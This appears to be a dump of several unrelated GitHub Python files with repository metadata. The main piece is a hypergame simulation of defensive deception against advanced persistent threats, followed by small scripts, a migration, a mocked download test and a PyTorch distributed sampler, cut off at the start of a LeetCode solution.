\"/R4\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R4/FPR.pkl\", \"wb+\")\n pickle.dump(FPR_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R4/TPR.pkl\", \"wb+\")\n pickle.dump(TPR_all_result, the_file)\n the_file.close()\n\n # Cost\n os.makedirs(\"data/\" + current_scheme + \"/R6\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R6/att_cost.pkl\", \"wb+\")\n pickle.dump(att_cost_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R6/def_cost.pkl\", \"wb+\")\n pickle.dump(def_cost_all_result, the_file)\n the_file.close()\n\n # Criticality\n # os.makedirs(\"data/\" + current_scheme + \"/R_self_1\", exist_ok=True)\n # the_file = open(\"data/\" + current_scheme + \"/R_self_1/criticality.pkl\",\n # \"wb+\")\n # pickle.dump(criticality_all_result, the_file)\n # the_file.close()\n\n # Evict attacker reason\n os.makedirs(\"data/\" + current_scheme + \"/R_self_2\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R_self_2/evict_reason.pkl\",\n \"wb+\")\n pickle.dump(evict_reason_all_result, the_file)\n the_file.close()\n\n # System Failure reason\n os.makedirs(\"data/\" + current_scheme + \"/R_self_3\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R_self_3/system_fail.pkl\",\n \"wb+\")\n pickle.dump(SysFail_reason, the_file)\n the_file.close()\n\n # EU_C & EU_CMS\n os.makedirs(\"data/\" + current_scheme + \"/R_self_4\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/att_EU_C.pkl\", \"wb+\")\n pickle.dump(att_EU_C_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/att_EU_CMS.pkl\",\n \"wb+\")\n pickle.dump(att_EU_CMS_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/def_EU_C.pkl\", \"wb+\")\n pickle.dump(def_EU_C_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/def_EU_CMS.pkl\",\n \"wb+\")\n pickle.dump(def_EU_CMS_all_result, the_file)\n the_file.close()\n\n # attacker & defender impact\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/att_impact.pkl\",\n \"wb+\")\n pickle.dump(att_impact_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/def_impact.pkl\",\n \"wb+\")\n pickle.dump(def_impact_all_result, the_file)\n the_file.close()\n\n # HEU in DD IPI\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/att_HEU_DD_IPI.pkl\",\n \"wb+\")\n pickle.dump(att_HEU_DD_IPI_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/def_HEU_DD_IPI.pkl\",\n \"wb+\")\n pickle.dump(def_HEU_DD_IPI_all_result, the_file)\n the_file.close()\n\n # NIDS evict good or bad\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/NIDS_eviction.pkl\",\n \"wb+\")\n pickle.dump(NIDS_eviction_all_result, the_file)\n the_file.close()\n\n # Hitting Probability\n the_file = open(\"data/\" + current_scheme + \"/R_self_4/hitting_probability.pkl\", \"wb+\")\n pickle.dump(hitting_probability_all_result, the_file)\n the_file.close()\n\n # defender strategy success or failure\n os.makedirs(\"data/\" + current_scheme + \"/R6\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R6/def_succ_counter.pkl\", \"wb+\")\n pickle.dump(def_succ_counter_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/R6/def_fail_counter.pkl\", \"wb+\")\n 
pickle.dump(def_fail_counter_all_result, the_file)\n the_file.close()\n\n # defender cost per strategy\n os.makedirs(\"data/\" + current_scheme + \"/R6\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/R6/def_cost_per_strat.pkl\", \"wb+\")\n pickle.dump(cost_per_strat_allresult, the_file)\n the_file.close()\n\n\ndef run_sumulation_group_varying_vul(current_scheme, DD_using, uncertain_scheme,\n simulation_time):\n vul_range = {}\n MTTSF_all_result = np.zeros(5)\n att_cost_all_result = np.zeros(5)\n def_cost_all_result = np.zeros(5)\n att_HEU_all_result = np.zeros(5)\n def_HEU_all_result = np.zeros(5)\n att_uncertainty_all_result = np.zeros(5)\n def_uncertainty_all_result = np.zeros(5)\n FPR_all_result = np.zeros(5)\n TPR_all_result = np.zeros(5)\n\n # web_data_SoftVul_range = range(3,7+1)\n # IoT_SoftVul_range = range(1,5+1)\n web_data_SoftVul_range = np.array(range(1, 5 + 1)) * 2\n IoT_SoftVul_range = np.array(range(1, 5 + 1)) * 2\n vul_range[0] = web_data_SoftVul_range\n vul_range[1] = IoT_SoftVul_range\n\n results = []\n with concurrent.futures.ProcessPoolExecutor() as executor:\n for vul_index in range(5):\n particular_vul_result = []\n for i in range(simulation_time):\n future = executor.submit(\n game_start, i, DD_using, uncertain_scheme,\n web_data_upper_vul=web_data_SoftVul_range[vul_index],\n Iot_upper_vul=IoT_SoftVul_range[vul_index]) # scheme change here\n particular_vul_result.append(future)\n results.append(particular_vul_result)\n\n index = 0\n for particular_vul_result in results:\n total_time_for_all_sim = 0\n for future in particular_vul_result:\n # change web server and database vul\n # MTTSF\n MTTSF_all_result[index] += future.result().lifetime\n # Cost\n att_cost_all_result[index] += sum(\n future.result().att_cost_history) / len(\n future.result().att_cost_history)\n def_cost_all_result[index] += sum(\n future.result().def_cost_history) / len(\n future.result().def_cost_history)\n # HEU\n att_HEU_all_result[index] += sum(\n future.result().att_HEU_history) / len(\n future.result().att_HEU_history)\n def_HEU_all_result[index] += sum(\n future.result().def_HEU_history) / len(\n future.result().def_HEU_history)\n # Uncertainty\n att_uncertainty_all_result[index] += sum(\n future.result().att_uncertainty_history) / len(\n future.result().att_uncertainty_history)\n def_uncertainty_all_result[index] += sum(\n future.result().def_uncertainty_history) / len(\n future.result().def_uncertainty_history)\n # FPR & TPR\n FPR_all_result[index] += sum(\n future.result().FPR_history) / len(\n future.result().FPR_history)\n TPR_all_result[index] += sum(\n future.result().TPR_history) / len(\n future.result().TPR_history)\n total_time_for_all_sim += 1\n\n att_cost_all_result[\n index] = att_cost_all_result[index] / total_time_for_all_sim\n def_cost_all_result[\n index] = def_cost_all_result[index] / total_time_for_all_sim\n att_HEU_all_result[\n index] = att_HEU_all_result[index] / total_time_for_all_sim\n def_HEU_all_result[\n index] = def_HEU_all_result[index] / total_time_for_all_sim\n att_uncertainty_all_result[index] = att_uncertainty_all_result[\n index] / total_time_for_all_sim\n def_uncertainty_all_result[index] = def_uncertainty_all_result[\n index] / total_time_for_all_sim\n FPR_all_result[\n index] = FPR_all_result[index] / total_time_for_all_sim\n TPR_all_result[\n index] = TPR_all_result[index] / total_time_for_all_sim\n MTTSF_all_result[index] = MTTSF_all_result[index] / simulation_time\n index += 1\n\n # SAVE to FILE (need to create directory manually)\n 
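# (each metric below is the per-vulnerability-level mean over all simulations)\n    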
# Vul range\n os.makedirs(\"data/\" + current_scheme + \"/VUB\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/VUB/Range.pkl\", \"wb+\")\n pickle.dump(vul_range, the_file)\n the_file.close()\n # MTTSF\n os.makedirs(\"data/\" + current_scheme + \"/VUB\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/VUB/MTTSF.pkl\", \"wb+\")\n pickle.dump(MTTSF_all_result, the_file)\n the_file.close()\n\n # Cost\n os.makedirs(\"data/\" + current_scheme + \"/VUB\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/VUB/att_cost.pkl\", \"wb+\")\n pickle.dump(att_cost_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/VUB/def_cost.pkl\", \"wb+\")\n pickle.dump(def_cost_all_result, the_file)\n the_file.close()\n\n # HEU\n os.makedirs(\"data/\" + current_scheme + \"/VUB\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/VUB/att_HEU.pkl\", \"wb+\")\n pickle.dump(att_HEU_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/VUB/def_HEU.pkl\", \"wb+\")\n pickle.dump(def_HEU_all_result, the_file)\n the_file.close()\n\n # Uncertainty\n os.makedirs(\"data/\" + current_scheme + \"/VUB\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/VUB/att_uncertainty.pkl\",\n \"wb+\")\n pickle.dump(att_uncertainty_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/VUB/def_uncertainty.pkl\",\n \"wb+\")\n pickle.dump(def_uncertainty_all_result, the_file)\n the_file.close()\n\n # FPR & TPR\n os.makedirs(\"data/\" + current_scheme + \"/VUB\", exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/VUB/FPR.pkl\", \"wb+\")\n pickle.dump(FPR_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/VUB/TPR.pkl\", \"wb+\")\n pickle.dump(TPR_all_result, the_file)\n the_file.close()\n\n\n# def run_sumulation_group_varying_Th_risk(current_scheme, DD_using, uncertain_scheme,\n# simulation_time):\n# varying_range = [0.1, 0.2, 0.3, 0.4, 0.5]\n#\n# MTTSF_all_result = np.zeros(len(varying_range))\n# FPR_all_result = np.zeros(len(varying_range))\n# TPR_all_result = np.zeros(len(varying_range))\n#\n# results = []\n# with concurrent.futures.ProcessPoolExecutor() as executor:\n# for vary_index in range(len(varying_range)):\n# particular_vul_result = []\n# for i in range(simulation_time):\n# future = executor.submit(\n# game_start, i, DD_using, uncertain_scheme, Th_risk=varying_range[vary_index]) # scheme change here\n# particular_vul_result.append(future)\n# results.append(particular_vul_result)\n#\n# index = 0\n# for particular_vul_result in results:\n# total_time_for_all_sim = 0\n# for future in particular_vul_result:\n# # change web server and database vul\n# # MTTSF\n# MTTSF_all_result[index] += future.result().lifetime\n# # FPR & TPR\n# FPR_all_result[index] += sum(\n# future.result().FPR_history) / len(\n# future.result().FPR_history)\n# TPR_all_result[index] += sum(\n# future.result().TPR_history) / len(\n# future.result().TPR_history)\n# total_time_for_all_sim += 1\n#\n# FPR_all_result[\n# index] = FPR_all_result[index] / total_time_for_all_sim\n# TPR_all_result[\n# index] = TPR_all_result[index] / total_time_for_all_sim\n# MTTSF_all_result[index] = MTTSF_all_result[index] / simulation_time\n# index += 1\n#\n# # SAVE to FILE (need to create directory manually)\n# # vary range\n# os.makedirs(\"data/\" + current_scheme + \"/Th_risk\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + 
\"/Th_risk/Range.pkl\", \"wb+\")\n# pickle.dump(varying_range, the_file)\n# the_file.close()\n# # MTTSF\n# os.makedirs(\"data/\" + current_scheme + \"/Th_risk\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/Th_risk/MTTSF.pkl\", \"wb+\")\n# pickle.dump(MTTSF_all_result, the_file)\n# the_file.close()\n#\n# # FPR & TPR\n# os.makedirs(\"data/\" + current_scheme + \"/Th_risk\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/Th_risk/FPR.pkl\", \"wb+\")\n# pickle.dump(FPR_all_result, the_file)\n# the_file.close()\n# the_file = open(\"data/\" + current_scheme + \"/Th_risk/TPR.pkl\", \"wb+\")\n# pickle.dump(TPR_all_result, the_file)\n# the_file.close()\n\n\n# def run_sumulation_group_varying_lambda(current_scheme, DD_using, uncertain_scheme,\n# simulation_time):\n# varying_range = [0.6, 0.7, 0.8, 0.9, 1]\n#\n# MTTSF_all_result = np.zeros(len(varying_range))\n# FPR_all_result = np.zeros(len(varying_range))\n# TPR_all_result = np.zeros(len(varying_range))\n#\n# results = []\n# with concurrent.futures.ProcessPoolExecutor() as executor:\n# for vary_index in range(len(varying_range)):\n# particular_vul_result = []\n# for i in range(simulation_time):\n# future = executor.submit(\n# game_start, i, DD_using, uncertain_scheme, _lambda=varying_range[vary_index]) # scheme change here\n# particular_vul_result.append(future)\n# results.append(particular_vul_result)\n#\n# index = 0\n# for particular_vul_result in results:\n# total_time_for_all_sim = 0\n# for future in particular_vul_result:\n# # change web server and database vul\n# # MTTSF\n# MTTSF_all_result[index] += future.result().lifetime\n# # FPR & TPR\n# FPR_all_result[index] += sum(\n# future.result().FPR_history) / len(\n# future.result().FPR_history)\n# TPR_all_result[index] += sum(\n# future.result().TPR_history) / len(\n# future.result().TPR_history)\n# total_time_for_all_sim += 1\n#\n# FPR_all_result[\n# index] = FPR_all_result[index] / total_time_for_all_sim\n# TPR_all_result[\n# index] = TPR_all_result[index] / total_time_for_all_sim\n# MTTSF_all_result[index] = MTTSF_all_result[index] / simulation_time\n# index += 1\n#\n# # SAVE to FILE (need to create directory manually)\n# # vary range\n# os.makedirs(\"data/\" + current_scheme + \"/_lambda\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/_lambda/Range.pkl\", \"wb+\")\n# pickle.dump(varying_range, the_file)\n# the_file.close()\n# # MTTSF\n# os.makedirs(\"data/\" + current_scheme + \"/_lambda\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/_lambda/MTTSF.pkl\", \"wb+\")\n# pickle.dump(MTTSF_all_result, the_file)\n# the_file.close()\n#\n# # FPR & TPR\n# os.makedirs(\"data/\" + current_scheme + \"/_lambda\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/_lambda/FPR.pkl\", \"wb+\")\n# pickle.dump(FPR_all_result, the_file)\n# the_file.close()\n# the_file = open(\"data/\" + current_scheme + \"/_lambda/TPR.pkl\", \"wb+\")\n# pickle.dump(TPR_all_result, the_file)\n# the_file.close()\n\n\n# def run_sumulation_group_varying_mu(current_scheme, DD_using, uncertain_scheme,\n# simulation_time):\n# varying_range = [6, 7, 8, 9, 10]\n#\n# MTTSF_all_result = np.zeros(len(varying_range))\n# FPR_all_result = np.zeros(len(varying_range))\n# TPR_all_result = np.zeros(len(varying_range))\n#\n# results = []\n# with concurrent.futures.ProcessPoolExecutor() as executor:\n# for vary_index in range(len(varying_range)):\n# particular_vul_result = []\n# for i in range(simulation_time):\n# future = executor.submit(\n# 
game_start, i, DD_using, uncertain_scheme, mu=varying_range[vary_index]) # scheme change here\n# particular_vul_result.append(future)\n# results.append(particular_vul_result)\n#\n# index = 0\n# for particular_vul_result in results:\n# total_time_for_all_sim = 0\n# for future in particular_vul_result:\n# # change web server and database vul\n# # MTTSF\n# MTTSF_all_result[index] += future.result().lifetime\n# # FPR & TPR\n# FPR_all_result[index] += sum(\n# future.result().FPR_history) / len(\n# future.result().FPR_history)\n# TPR_all_result[index] += sum(\n# future.result().TPR_history) / len(\n# future.result().TPR_history)\n# total_time_for_all_sim += 1\n#\n# FPR_all_result[\n# index] = FPR_all_result[index] / total_time_for_all_sim\n# TPR_all_result[\n# index] = TPR_all_result[index] / total_time_for_all_sim\n# MTTSF_all_result[index] = MTTSF_all_result[index] / simulation_time\n# index += 1\n#\n# # SAVE to FILE (need to create directory manually)\n# # vary range\n# os.makedirs(\"data/\" + current_scheme + \"/mu\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/mu/Range.pkl\", \"wb+\")\n# pickle.dump(varying_range, the_file)\n# the_file.close()\n# # MTTSF\n# os.makedirs(\"data/\" + current_scheme + \"/mu\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/mu/MTTSF.pkl\", \"wb+\")\n# pickle.dump(MTTSF_all_result, the_file)\n# the_file.close()\n#\n# # FPR & TPR\n# os.makedirs(\"data/\" + current_scheme + \"/mu\", exist_ok=True)\n# the_file = open(\"data/\" + current_scheme + \"/mu/FPR.pkl\", \"wb+\")\n# pickle.dump(FPR_all_result, the_file)\n# the_file.close()\n# the_file = open(\"data/\" + current_scheme + \"/mu/TPR.pkl\", \"wb+\")\n# pickle.dump(TPR_all_result, the_file)\n# the_file.close()\n\n\ndef run_sumulation_group_varying_universal(current_scheme, DD_using, uncertain_scheme, simulation_time, variable_name,\n varying_range):\n MTTSF_all_result = np.zeros(len(varying_range))\n FPR_all_result = np.zeros(len(varying_range))\n TPR_all_result = np.zeros(len(varying_range))\n att_uncertainty_all_result = np.zeros(len(varying_range))\n def_uncertainty_all_result = np.zeros(len(varying_range))\n\n results = []\n with concurrent.futures.ProcessPoolExecutor() as executor:\n for vary_index in range(len(varying_range)):\n particular_vul_result = []\n for i in range(simulation_time):\n future = eval(\n \"executor.submit(game_start, i, DD_using, uncertain_scheme, \" + variable_name + \"=varying_range[vary_index])\") # scheme change here\n particular_vul_result.append(future)\n results.append(particular_vul_result)\n\n index = 0\n for particular_vul_result in results:\n total_time_for_all_sim = 0\n for future in particular_vul_result:\n # change web server and database vul\n # MTTSF\n MTTSF_all_result[index] += future.result().lifetime\n # FPR & TPR\n FPR_all_result[index] += sum(\n future.result().FPR_history) / len(\n future.result().FPR_history)\n TPR_all_result[index] += sum(\n future.result().TPR_history) / len(\n future.result().TPR_history)\n # Uncertainty\n att_uncertainty_all_result[index] += sum(\n future.result().att_uncertainty_history) / len(\n future.result().att_uncertainty_history)\n def_uncertainty_all_result[index] += sum(\n future.result().def_uncertainty_history) / len(\n future.result().def_uncertainty_history)\n total_time_for_all_sim += 1\n\n FPR_all_result[\n index] = FPR_all_result[index] / total_time_for_all_sim\n TPR_all_result[\n index] = TPR_all_result[index] / total_time_for_all_sim\n MTTSF_all_result[index] = MTTSF_all_result[index] 
/ simulation_time\n att_uncertainty_all_result[index] = att_uncertainty_all_result[\n index] / total_time_for_all_sim\n def_uncertainty_all_result[index] = def_uncertainty_all_result[\n index] / total_time_for_all_sim\n index += 1\n\n # SAVE to FILE (need to create directory manually)\n # vary range\n os.makedirs(\"data/\" + current_scheme + \"/\" + variable_name, exist_ok=True)\n the_file = open(\"data/\" + current_scheme + \"/\" + variable_name + \"/Range.pkl\", \"wb+\")\n pickle.dump(varying_range, the_file)\n the_file.close()\n # MTTSF\n the_file = open(\"data/\" + current_scheme + \"/\" + variable_name + \"/MTTSF.pkl\", \"wb+\")\n pickle.dump(MTTSF_all_result, the_file)\n the_file.close()\n\n # FPR & TPR\n the_file = open(\"data/\" + current_scheme + \"/\" + variable_name + \"/FPR.pkl\", \"wb+\")\n pickle.dump(FPR_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/\" + variable_name + \"/TPR.pkl\", \"wb+\")\n pickle.dump(TPR_all_result, the_file)\n the_file.close()\n\n # uncertainty\n the_file = open(\"data/\" + current_scheme + \"/\" + variable_name + \"/defender_uncertainty.pkl\", \"wb+\")\n pickle.dump(def_uncertainty_all_result, the_file)\n the_file.close()\n the_file = open(\"data/\" + current_scheme + \"/\" + variable_name + \"/attacker_uncertainty.pkl\", \"wb+\")\n pickle.dump(att_uncertainty_all_result, the_file)\n the_file.close()\n","repo_name":"Wan-ZL/ARO-Foureye","sub_path":"Foureye 1 - Defensive Deception Against Advanced Persistent Threats via Hypergame Theory/PycharmProject/Foureye_parallel_simulation.py","file_name":"Foureye_parallel_simulation.py","file_ext":"py","file_size_in_byte":45829,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"36099101984","text":"# %%\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nsns.set(style=\"whitegrid\")\n\n# %%\nl_ttl = 8.4\nA = (7.5e-4)**2*np.pi #m^2\nI = 5 #A\nsigma = 3.46e6 #S/m\nc = 296 #J/Kg/K\nrho = 6440 #kg/m^3\nQ = 1.5e-8 #m^3/s\n\n# %%\ndl = 1e-3\nl = np.arange(0,l_ttl,dl)\ntemps = 20 + (I*l)/(c*rho*A*sigma*Q)\n\n#%%\nplt.plot(l,temps)\nplt.xlabel(\"Length\")\nplt.ylabel(\"Temperature\")\n\n#%%\n\n#%%\n","repo_name":"gvwalgiya/honours_project","sub_path":"archive/temp_validation.py","file_name":"temp_validation.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71138387049","text":"'''520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.\n\nWhat is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?'''\n\n\n\nn = int(input(\"To find the smallest positive number that is evenly divisible by all of the numbers from 1 to : _\"))\n\ndef smallestEvenlyDivisible(n):\n\ttestRange = range(1, n + 1)\n\tw = range(1, 1000000000000000000000000000000000000000000000000)\t\t\t\n\tfor x in w:\n\t\tcount = 0\n\t\tfor y in testRange:\n\t\t\tif x % y == 0:\n\t\t\t\tcount = count + 1\n\t\t\t\tif count == n:\n\t\t\t\t\treturn x\nfor t in range(n):\n\tprint(t , smallestEvenlyDivisible(t))","repo_name":"Emmanuel-Odero/practice","sub_path":"projects_on_progress/self_made/eulerMathematicalProjects/prob5.py","file_name":"prob5.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40433030857","text":"\"\"\"empty message\n\nRevision 
ID: 86fb3e3ea7e8\nRevises: e49f2ae65e25\nCreate Date: 2022-06-08 14:16:45.065457\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '86fb3e3ea7e8'\ndown_revision = 'e49f2ae65e25'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('appointments', sa.Column('date', sa.String(length=50), nullable=False))\n op.add_column('appointments', sa.Column('time', sa.String(length=50), nullable=False))\n op.drop_column('appointments', 'appointment')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('appointments', sa.Column('appointment', postgresql.TIMESTAMP(), autoincrement=False, nullable=False))\n op.drop_column('appointments', 'time')\n op.drop_column('appointments', 'date')\n # ### end Alembic commands ###\n","repo_name":"frances-y-h/yillow","sub_path":"migrations/versions/20220608_141645_.py","file_name":"20220608_141645_.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22105011828","text":"from test_base import *\nfrom sure import expect\nimport httpretty\n\nclass DownloadTestCase(unittest.TestCase):\n \n def setUp(self):\n self.token = '12345'\n self.myhost = 'http://somehost'\n self.initial_config_state = config.load()\n hiev.set_token(self.token)\n hiev.set_host(self.myhost)\n \n def tearDown(self):\n config.reload(self.initial_config_state)\n\n # define callback function\n def request_callback(self, request, uri, headers):\n #print(uri)\n self.assertEqual(uri, self.expected_uri) \n return (200, headers, 'Success\\n') \n \n @httpretty.activate\n def test_download(self):\n import json\n fileid = 137\n filename = 'returned.txt'\n j = json.dumps([{'file_id': fileid, 'filename': filename}])\n metadata = json.loads(j)\n download_fragment = hiev.DOWNLOAD_FILE_URL_FRAGMENT % fileid\n url = '%s/%s' % (self.myhost, download_fragment) \n self.expected_uri = '%s?auth_token=12345' % url\n httpretty.register_uri(httpretty.GET, url, body=self.request_callback)\n dest = '/tmp'\n hiev.download(metadata, dest)\n f = '%s/%s' % (dest, filename)\n file_exists(f)\n os.remove(f)\n \n ","repo_name":"IntersectAustralia/divermodc","sub_path":"notebook/tests/test_download.py","file_name":"test_download.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30520087648","text":"import torch\nfrom torch.utils.data.distributed import DistributedSampler\n#import random\n#import numpy as np\nimport math\nimport torch\nimport torch.distributed as dist\nclass ShuffleDistributedSampler(DistributedSampler):\n \"\"\"Sampler that restricts data loading to a subset of input sampler indices.\n\n It is especially useful in conjunction with\n :class:`torch.nn.parallel.DistributedDataParallel`. In such case, each\n process can pass a DistributedSampler instance as a DataLoader sampler,\n and load a subset of the original dataset that is exclusive to it.\n\n .. 
note::\n        The dataset length is assumed to be constant.\n\n    Arguments:\n        dataset_len: Length of the dataset to sample from.\n        num_replicas (optional): Number of processes participating in\n            distributed training.\n        rank (optional): Rank of the current process within num_replicas.\n    \"\"\"\n\n    def __init__(self, dataset_len=None, num_replicas=None, rank=None, seed=0, drop_last=True,shuffle=True):\n        #super(ShuffleDistributedSampler, self).__init__(sampler, num_replicas=num_replicas, rank=rank, shuffle=True)\n        #self.sampler = sampler\n        self.dataset_len = dataset_len\n\n        if num_replicas is None:\n            if not dist.is_available():\n                raise RuntimeError(\"Requires distributed package to be available\")\n            num_replicas = dist.get_world_size()\n        if rank is None:\n            if not dist.is_available():\n                raise RuntimeError(\"Requires distributed package to be available\")\n            rank = dist.get_rank()\n        if rank >= num_replicas or rank < 0:\n            raise ValueError(\n                \"Invalid rank {}, rank should be in the interval\"\n                \" [0, {}]\".format(rank, num_replicas - 1))\n\n        self.num_replicas = num_replicas\n        self.rank = rank\n        self.epoch = 0\n        self.drop_last = drop_last\n        # If the dataset length is evenly divisible by # of replicas, then there\n        # is no need to drop any data, since the dataset will be split equally.\n        if self.dataset_len is None:\n            raise RuntimeError(\"Length of the dataset is unknown.\")\n\n        if self.drop_last and self.dataset_len % self.num_replicas != 0: # type: ignore\n            # Split to nearest available length that is evenly divisible.\n            # This is to ensure each rank receives the same amount of data when\n            # using this Sampler.\n            self.num_samples = math.ceil(\n                # `type:ignore` is required because Dataset cannot provide a default __len__\n                # see NOTE in pytorch/torch/utils/data/sampler.py\n                (self.dataset_len - self.num_replicas) / self.num_replicas # type: ignore\n            )\n        else:\n            self.num_samples = math.ceil(self.dataset_len / self.num_replicas) # type: ignore\n        self.total_size = self.num_samples * self.num_replicas\n        self.shuffle = shuffle\n        self.seed = seed\n    \n    def __iter__(self):\n        if self.shuffle:\n            # deterministically shuffle based on epoch and seed\n            g = torch.Generator()\n            g.manual_seed(self.seed + self.epoch)\n            indices = torch.randperm(self.dataset_len, generator=g).tolist() # type: ignore\n            #seed = self.seed + self.epoch\n            #random.seed(seed)\n            #print('Epoch: ', self.epoch, 'Indices: ',indices)\n            #print('Seed: ', seed, 'Indices before: ',indices)\n            #random.shuffle(indices) # guarantee that use different images for each epoch \n            #print('Seed: ', seed, 'Indices after: ',indices)\n        else:\n            indices = list(range(self.dataset_len)) # type: ignore\n\n        if not self.drop_last:\n            # add extra samples to make it evenly divisible\n            padding_size = self.total_size - len(indices)\n            if padding_size <= len(indices):\n                indices += indices[:padding_size]\n            else:\n                indices += (indices * math.ceil(padding_size / len(indices)))[:padding_size]\n        else:\n            # remove tail of data to make it evenly divisible.\n            indices = indices[:self.total_size]\n        assert len(indices) == self.total_size\n        \n        # subsample\n        indices = indices[self.rank:self.total_size:self.num_replicas]\n        assert len(indices) == self.num_samples\n        #print('Epoch: ', self.epoch, ', Rank: ',self.rank, ' ', indices)\n        return iter(indices)\n\n    def get_indices(self):\n        if self.shuffle:\n            # deterministically shuffle based on epoch and seed\n            g = torch.Generator()\n            g.manual_seed(self.seed + 
self.epoch)\n if self.dataset_len is None:\n indices = torch.randperm(self.dataset_len, generator=g).tolist() # type: ignore\n else:\n indices = torch.randperm(self.dataset_len, generator=g).tolist() # type: ignore\n else:\n indices = list(range(self.dataset_len)) # type: ignore\n\n if not self.drop_last:\n # add extra samples to make it evenly divisible\n padding_size = self.total_size - len(indices)\n if padding_size <= len(indices):\n indices += indices[:padding_size]\n else:\n indices += (indices * math.ceil(padding_size / len(indices)))[:padding_size]\n else:\n # remove tail of data to make it evenly divisible.\n indices = indices[:self.total_size]\n assert len(indices) == self.total_size\n\n # subsample\n indices = indices[self.rank:self.total_size:self.num_replicas]\n assert len(indices) == self.num_samples\n # print('Epoch: ', self.epoch, ', Rank: ',self.rank, ' ', indices)\n return indices\n","repo_name":"Cvpr2022ID5164/CVPR2022-ID5164","sub_path":"gaml/ShuffleDistributedSampler.py","file_name":"ShuffleDistributedSampler.py","file_ext":"py","file_size_in_byte":5932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19983279597","text":"from dataclasses import dataclass\n\n\n@dataclass\nclass Person:\n name: str \n age: int\n\n def __post_init__(self):\n print(self.name)\n print(self.age)\n\n\ntest_person = Person(\"test_person_name\", 23)\nprint(repr(test_person))\n","repo_name":"DavidGugea/Mastering-Object-Oriented-Python-Programming","sub_path":"Section1/Chapter4/TutorialsAndTests/test16.py","file_name":"test16.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11544278956","text":"from glob import glob\nimport os\n\nfrom setuptools import setup\n\npackage_name = 'rm_decision'\n\nsetup(\n name=package_name,\n version='1.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n (os.path.join('share', package_name), glob('launch/*')),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='LihanChen',\n maintainer_email='1120220476@smbu.edu.cn',\n description='A decision package for RMUC/RMYC sentinel robots implemented based on a finite state machine',\n license='MIT',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'pb_auto_fsm = rm_decision.pb_auto_fsm:main',\n ],\n },\n)\n","repo_name":"LihanChen2004/PB_RMSimulation","sub_path":"src/rm_decision/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21664107315","text":"# Problem Link : https://leetcode.com/problems/search-in-rotated-sorted-array/\n\nclass 